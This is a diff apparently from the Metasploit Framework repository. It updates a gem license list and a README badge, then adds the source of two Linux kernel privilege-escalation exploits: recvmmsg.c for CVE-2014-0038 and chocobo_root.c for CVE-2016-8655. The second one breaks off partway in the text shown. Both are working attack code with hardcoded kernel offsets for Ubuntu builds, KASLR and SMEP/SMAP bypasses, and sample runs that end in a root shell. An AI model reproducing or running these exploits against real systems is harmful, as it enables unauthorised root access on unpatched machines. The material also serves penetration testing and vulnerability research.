-faraday, 0.12.1, MIT
+factory_bot, 4.8.2, MIT
+factory_bot_rails, 4.8.2, MIT
+faker, 1.8.7, MIT
+faraday, 0.14.0, MIT
 filesize, 0.1.1, MIT
-fivemat, 1.3.5, MIT
-google-protobuf, 3.3.0, "New BSD"
-googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.4.1, "New BSD"
+fivemat, 1.3.6, MIT
+google-protobuf, 3.5.1, "New BSD"
+googleapis-common-protos-types, 1.0.1, "Apache 2.0"
+googleauth, 0.6.2, "Apache 2.0"
+grpc, 1.8.3, "Apache 2.0"
 hashery, 2.1.2, "Simplified BSD"
-i18n, 0.8.6, MIT
+i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
 json, 2.1.0, ruby
-jwt, 1.5.6, MIT
+jwt, 2.1.0, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.2.2, MIT
-loofah, 2.0.3, MIT
+loofah, 2.2.0, MIT
 memoist, 0.16.0, MIT
 metasm, 1.0.3, LGPL
-metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-aggregator, 1.0.0, "New BSD"
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 2.0.10, "New BSD"
-metasploit-framework, 4.15.0, "New BSD"
+metasploit-credential, 2.0.13, "New BSD"
+metasploit-framework, 5.0.0, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.15, "New BSD"
-metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
-method_source, 0.8.2, MIT
-mini_portile2, 2.2.0, MIT
-minitest, 5.10.2, MIT
-msgpack, 1.1.0, "Apache 2.0"
-multi_json, 1.12.1, MIT
+metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.16, "New BSD"
+metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
+method_source, 0.9.0, MIT
+mini_portile2, 2.3.0, MIT
+minitest, 5.11.3, MIT
+mqtt, 0.5.0, MIT
+msgpack, 1.2.4, "Apache 2.0"
+multi_json, 1.13.1, MIT
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 4.1.0, MIT
-network_interface, 0.0.1, MIT
-nexpose, 6.1.0, BSD
-nokogiri, 1.8.0, MIT
-octokit, 4.7.0, MIT
+net-ssh, 4.2.0, MIT
+network_interface, 0.0.2, MIT
+nexpose, 7.2.0, BSD
+nokogiri, 1.8.2, MIT
+octokit, 4.8.0, MIT
 openssl-ccm, 1.2.1, MIT
 openvas-omp, 0.0.4, MIT
 os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.12.4, LGPL-2.1
-pdf-reader, 2.0.0, MIT
+pdf-reader, 2.1.0, MIT
 pg, 0.20.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.0, MIT
-pry, 0.10.4, MIT
-public_suffix, 2.0.5, MIT
-rack, 1.6.8, MIT
+pry, 0.11.3, MIT
+public_suffix, 3.0.2, MIT
+rack, 1.6.9, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.8, MIT
+rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.9, MIT
-rake, 12.0.0, MIT
-rb-readline, 0.5.4, BSD
-recog, 2.1.11, unknown
+railties, 4.2.10, MIT
+rake, 12.3.0, MIT
+rb-readline, 0.5.5, BSD
+recog, 2.1.18, unknown
 redcarpet, 3.4.0, MIT
-rex-arch, 0.1.9, "New BSD"
+rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.4, "New BSD"
-rex-core, 0.1.11, "New BSD"
+rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.15, "New BSD"
+rex-exploitation, 0.1.17, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.72, "New BSD"
-rex-random_identifier, 0.1.2, "New BSD"
+rex-powershell, 0.1.77, "New BSD"
+rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.8, "New BSD"
-rex-sslscan, 0.1.4, "New BSD"
+rex-socket, 0.1.10, "New BSD"
+rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.15, "New BSD"
+rex-text, 0.2.17, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-robots, 0.10.1, MIT
-rspec, 3.6.0, MIT
-rspec-core, 3.6.0, MIT
-rspec-expectations, 3.6.0, MIT
-rspec-mocks, 3.6.0, MIT
-rspec-rails, 3.6.0, MIT
+rspec, 3.7.0, MIT
+rspec-core, 3.7.1, MIT
+rspec-expectations, 3.7.0, MIT
+rspec-mocks, 3.7.0, MIT
+rspec-rails, 3.7.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.6.0, MIT
+rspec-support, 3.7.1, MIT
+ruby-macho, 1.1.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 0.0.18, "New BSD"
+ruby_smb, 0.0.23, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 1.2.1, "Simplified BSD"
 sawyer, 0.8.1, MIT
-signet, 0.7.3, "Apache 2.0"
-simplecov, 0.14.1, MIT
-simplecov-html, 0.10.1, MIT
-slop, 3.6.0, MIT
+signet, 0.8.1, "Apache 2.0"
+simplecov, 0.16.0, MIT
+simplecov-html, 0.10.2, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 1.9.0, MIT
-thor, 0.19.4, MIT
+thor, 0.20.0, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.3, MIT
-tzinfo-data, 1.2017.2, MIT
+tzinfo, 1.2.5, MIT
+tzinfo-data, 1.2018.3, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.9, MIT
+yard, 0.9.12, MIT

README.md

@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.

data/exploits/CVE-2014-0038/recvmmsg.c

@@ -0,0 +1,226 @@
+/* 
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+CVE-2014-0038 / x32 ABI with recvmmsg
+by rebel @ irc.smashthestack.org
+-----------------------------------
+
+takes about 13 minutes to run because timeout->tv_sec is decremented
+once per second and 0xff*3 is 765.
+
+some things you could do while waiting:
+  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
+  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
+  * brew some coffee
+  * stare at the countdown giggly with anticipation
+
+could probably whack the high bits of some pointer with nanoseconds,
+but that would require a bunch of nulls before the pointer and then
+reading an oops from dmesg which isn't that elegant.
+
+&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
+
+hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
+anyway..
+
+same principle will work on 32bit but I didn't really find any major
+distros shipping with CONFIG_X86_X32=y
+
+user@ubuntu:~$ uname -a
+Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
+user@ubuntu:~$ ./recvmmsg
+byte 3 / 3.. ~0 secs left.     
+w00p w00p!
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# sh phalanx-2.6b-x86_64.sh
+unpacking..
+
+:)=
+
+greets to my homeboys kaliman, beist, capsl & all of #social
+
+Sat Feb  1 22:15:19 CET 2014
+% rebel %
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+*/
+
+#define _GNU_SOURCE
+#include <netinet/ip.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/utsname.h>
+
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+#define VLEN 1
+#define BUFSIZE 200
+
+int port;
+
+struct offset {
+    char *kernel_version;
+    unsigned long dest; // net_sysctl_root + 96
+    unsigned long original_value; // net_ctl_permissions
+    unsigned long prepare_kernel_cred;
+    unsigned long commit_creds;
+};
+
+struct offset offsets[] = {
+    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+    {NULL,0,0,0,0}
+};
+
+void udp(int b) {
+    int sockfd;
+    struct sockaddr_in servaddr,cliaddr;
+    int s = 0xff+1;
+
+    if(fork() == 0) {
+        while(s > 0) {
+            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+            sleep(1);
+            s--;
+            fprintf(stderr,".");
+        }
+
+        sockfd = socket(AF_INET,SOCK_DGRAM,0);
+        bzero(&servaddr,sizeof(servaddr));
+        servaddr.sin_family = AF_INET;
+        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+        servaddr.sin_port=htons(port);
+        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+        exit(0);
+    }
+
+}
+
+void trigger() {
+    open("/proc/sys/net/core/somaxconn",O_RDONLY);
+
+    if(getuid() != 0) {
+        fprintf(stderr,"not root, ya blew it!\n");
+        exit(-1);
+    }
+
+    fprintf(stderr,"w00p w00p!\n");
+    system("/bin/sh -i");
+}
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+
+// thx bliss
+static int __attribute__((regparm(3)))
+getroot(void *head, void * table)
+{
+    commit_creds(prepare_kernel_cred(0));
+    return -1;
+}
+
+void __attribute__((regparm(3)))
+trampoline()
+{
+    asm("mov $getroot, %rax; call *%rax;");
+}
+
+int main(void)
+{
+    int sockfd, retval, i;
+    struct sockaddr_in sa;
+    struct mmsghdr msgs[VLEN];
+    struct iovec iovecs[VLEN];
+    char buf[BUFSIZE];
+    long mmapped;
+    struct utsname u;
+    struct offset *off = NULL;
+
+    uname(&u);
+
+    for(i=0;offsets[i].kernel_version != NULL;i++) {
+        if(!strcmp(offsets[i].kernel_version,u.release)) {
+            off = &offsets[i];
+            break;
+        }
+    }
+
+    if(!off) {
+        fprintf(stderr,"no offsets for this kernel version..\n");
+        exit(-1);
+    }
+
+    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
+    mmapped &= 0x000000ffffffffff;
+
+        srand(time(NULL));
+    port = (rand() % 30000)+1500;
+
+    commit_creds = (_commit_creds)off->commit_creds;
+    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+
+    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+
+    if(mmapped == -1) {
+        perror("mmap()");
+        exit(-1);
+    }
+
+    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+
+    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+
+    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+        perror("mprotect()");
+        exit(-1);
+    }
+    
+    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+    if (sockfd == -1) {
+        perror("socket()");
+        exit(-1);
+    }
+
+    sa.sin_family = AF_INET;
+    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+    sa.sin_port = htons(port);
+
+    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+        perror("bind()");
+        exit(-1);
+    }
+
+    memset(msgs, 0, sizeof(msgs));
+
+    iovecs[0].iov_base = &buf;
+    iovecs[0].iov_len = BUFSIZE;
+    msgs[0].msg_hdr.msg_iov = &iovecs[0];
+    msgs[0].msg_hdr.msg_iovlen = 1;
+
+    for(i=0;i < 3 ;i++) {
+        udp(i);
+        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+        if(!retval) {
+            fprintf(stderr,"\nrecvmmsg() failed\n");
+        }
+    }
+
+    close(sockfd); 
+
+    fprintf(stderr,"\n");
+
+    trigger();
+}

data/exploits/CVE-2016-8655/chocobo_root.c

@@ -0,0 +1,945 @@
+/*
+chocobo_root.c
+linux AF_PACKET race condition exploit for CVE-2016-8655.
+Includes KASLR and SMEP/SMAP bypasses.
+For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
+All kernel offsets have been tested on Ubuntu / Linux Mint.
+
+vroom vroom
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+user@ubuntu:~$ uname -a
+Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ id
+uid=1000(user) gid=1000(user) groups=1000(user)
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ ./chocobo_root
+linux AF_PACKET race condition exploit by rebel
+kernel version: 4.4.0-51-generic #72
+proc_dostring = 0xffffffff81088090
+modprobe_path = 0xffffffff81e48f80
+register_sysctl_table = 0xffffffff812879a0
+set_memory_rw = 0xffffffff8106f320
+exploit starting
+making vsyscall page writable..
+
+new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 174222, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+vsyscall page altered!
+
+
+stage 1 completed
+registering new sysctl..
+
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 30773, last val = 0)
+current packet version = 2
+pbd->hdr.bh1.offset_to_first_pkt = 48
+race not won
+
+retrying stage..
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 133577, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+sysctl added!
+
+stage 2 completed
+binary executed by kernel, launching rootshell
+root@ubuntu:~# id
+uid=0(root) gid=0(root) groups=0(root),1000(user)
+
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+Shoutouts to:
+jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
+mcdelivery for delivering hotcakes and coffee
+
+11/2016
+by rebel
+---
+Updated by <bcoles@gmail.com>
+- check number of CPU cores
+- KASLR bypasses
+- additional kernel targets
+https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+*/
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <poll.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/sysinfo.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/sched.h>
+#include <netinet/tcp.h>
+#include <netinet/if_ether.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS 1
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions()
+int kernel = -1;
+
+// New sysctl path
+const char *SYSCTL_NAME = "hack";
+const char *SYSCTL_PATH = "/proc/sys/hack";
+
+volatile int barrier = 1;
+volatile int vers_switcher_done = 0;
+
+struct kernel_info {
+    char *kernel_version;
+    unsigned long proc_dostring;
+    unsigned long modprobe_path;
+    unsigned long register_sysctl_table;
+    unsigned long set_memory_rw;
+};
+
+struct kernel_info kernels[] = {
+    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
+    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
+    { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },
+    { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },
+    { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },
+    { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },
+    { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },
+    { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },
+    { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 },
+    { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 },
+    //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880},
+    { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },
+    //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880},
+    { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 },
+
+    { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },
+    { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },
+    { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },
+    { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },
+    { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },
+    { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },
+    { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },
+    { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },
+    { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },
+    { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },
+    { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },
+    //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320},
+    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
+    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
+    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+};
+
+#define VSYSCALL              0xffffffffff600000
+#define PROC_DOSTRING         (KERNEL_BASE + kernels[kernel].proc_dostring)
+#define MODPROBE_PATH         (KERNEL_BASE + kernels[kernel].modprobe_path)
+#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)
+#define SET_MEMORY_RW         (KERNEL_BASE + kernels[kernel].set_memory_rw)
+
+#define KMALLOC_PAD 64
+
+int pad_fds[KMALLOC_PAD];
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+struct ctl_table {
+    const char *procname;
+    void *data;
+    int maxlen;
+    unsigned short mode;
+    struct ctl_table *child;
+    void *proc_handler;
+    void *poll;
+    void *extra1;
+    void *extra2;
+};
+
+#define CONF_RING_FRAMES 1
+
+struct tpacket_req3 tp;
+int sfd;
+int mapped = 0;
+
+struct timer_list {
+    void *next;
+    void *prev;
+    unsigned long           expires;
+    void                    (*function)(unsigned long);
+    unsigned long           data;
+    unsigned int            flags;
+    int                     slack;
+};
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void *setsockopt_thread(void *arg)
+{
+    while (barrier) {}
+    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
+
+    return NULL;
+}
+
+void *vers_switcher(void *arg)
+{
+    int val,x,y;
+
+    while (barrier) {}
+
+    while (1) {
+        val = TPACKET_V1;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        y++;
+
+        if (x != 0) break;
+
+        val = TPACKET_V3;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        if (x != 0) break;
+
+        y++;
+    }
+
+    dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
+    vers_switcher_done = 1;
+
+    return NULL;
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+#define BUFSIZE 1408
+char exploitbuf[BUFSIZE];
+
+void kmalloc(void)
+{
+    while(1)
+        syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2);
+}
+
+void pad_kmalloc(void)
+{
+    int x;
+    for (x = 0; x < KMALLOC_PAD; x++)
+        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
+            dprintf("[-] pad_kmalloc() socket error\n");
+            exit(EXIT_FAILURE);
+        }
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    pthread_t setsockopt_thread_thread,a;
+    int val;
+    socklen_t l;
+    struct timer_list *timer;
+    int fd;
+    struct tpacket_block_desc *pbd;
+    int off;
+    sigset_t set;
+
+    sigemptyset(&set);
+
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(1);
+    }
+
+    dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg);
+
+    pad_kmalloc();
+
+    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+
+    if (fd == -1) {
+        dprintf("[-] target socket error\n");
+        exit(1);
+    }
+
+    pad_kmalloc();
+
+    dprintf("[.] done, sockets allocated\n");
+
+    val = TPACKET_V3;
+
+    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
+    tp.tp_block_nr = 1;
+    tp.tp_frame_size = getpagesize();
+    tp.tp_frame_nr = CONF_RING_FRAMES;
+
+    // try to set the timeout to 10 seconds
+    // the default timeout might still be used though depending on when the race was won
+    tp.tp_retire_blk_tov = 10000;
+
+    sfd = fd;
+
+    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
+        dprintf("[-] Error creating thread\n");
+        return 1;
+    }
+
+    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
+
+    usleep(200000);
+
+    dprintf("[.] removing barrier and spraying...\n");
+
+    memset(exploitbuf, '\x00', BUFSIZE);
+
+    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
+    timer->next = 0;
+    timer->prev = 0;
+
+    timer->expires = 4294943360;
+    timer->function = (void *)func;
+    timer->data = arg;
+    timer->flags = 1;
+    timer->slack = -1;
+
+    barrier = 0;
+
+    usleep(100000);
+
+    while (!vers_switcher_done) usleep(100000);
+
+    l = sizeof(val);
+    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
+
+    dprintf("[.] current packet version = %d\n",val);
+
+    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
+
+    if (pbd == MAP_FAILED) {
+        dprintf("[-] could not map pbd\n");
+        exit(1);
+    } else {
+        off = pbd->hdr.bh1.offset_to_first_pkt;
+        dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off);
+    }
+
+
+    if (val == TPACKET_V1 && off != 0) {
+        dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
+    } else {
+        dprintf("[-] race not won\n");
+        exit(2);
+    }
+
+    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
+
+    pthread_create(&a, NULL, verification_func, (void *)NULL);
+
+    dprintf("\n");
+    dprintf("[!] please wait up to a few minutes for timer to be executed.\n");
+    dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n");
+    dprintf("\n");
+
+    sleep(1);
+    dprintf("[.] closing socket and verifying...\n");
+
+    close(sfd);
+
+    kmalloc();
+
+    dprintf("[.] all messages sent\n");
+
+    sleep(31337);
+    exit(1);
+}
+
+int verification_result = 0;
+
+void catch_sigsegv(int sig)
+{
+    verification_result = 0;
+    pthread_exit((void *)1);
+}
+
+void *modify_vsyscall(void *arg)
+{
+    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
+    unsigned long x = (unsigned long)arg;
+
+    sigset_t set;
+    sigemptyset(&set);
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(EXIT_FAILURE);
+    }
+
+    signal(SIGSEGV, catch_sigsegv);
+
+    *vsyscall = 0xdeadbeef+x;
+
+    if (*vsyscall == 0xdeadbeef+x) {
+        dprintf("[~] vsyscall page altered!\n");
+        verification_result = 1;
+        pthread_exit(0);
+    }
+
+    return NULL;
+}
+
+void verify_stage1(void)
+{
+    pthread_t v_thread;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
+
+        pthread_join(v_thread, NULL);
+
+        if(verification_result == 1) {
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not modify vsyscall\n");
+    exit(EXIT_FAILURE);
+}
+
+void verify_stage2(void)
+{
+    struct stat b;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        if (stat(SYSCTL_PATH, &b) == 0) {
+            dprintf("[~] sysctl added!\n");
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not add sysctl\n");
+    exit(EXIT_FAILURE);
+}
+
+void exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    int status;
+    int pid;
+
+retry:
+
+    pid = fork();
+
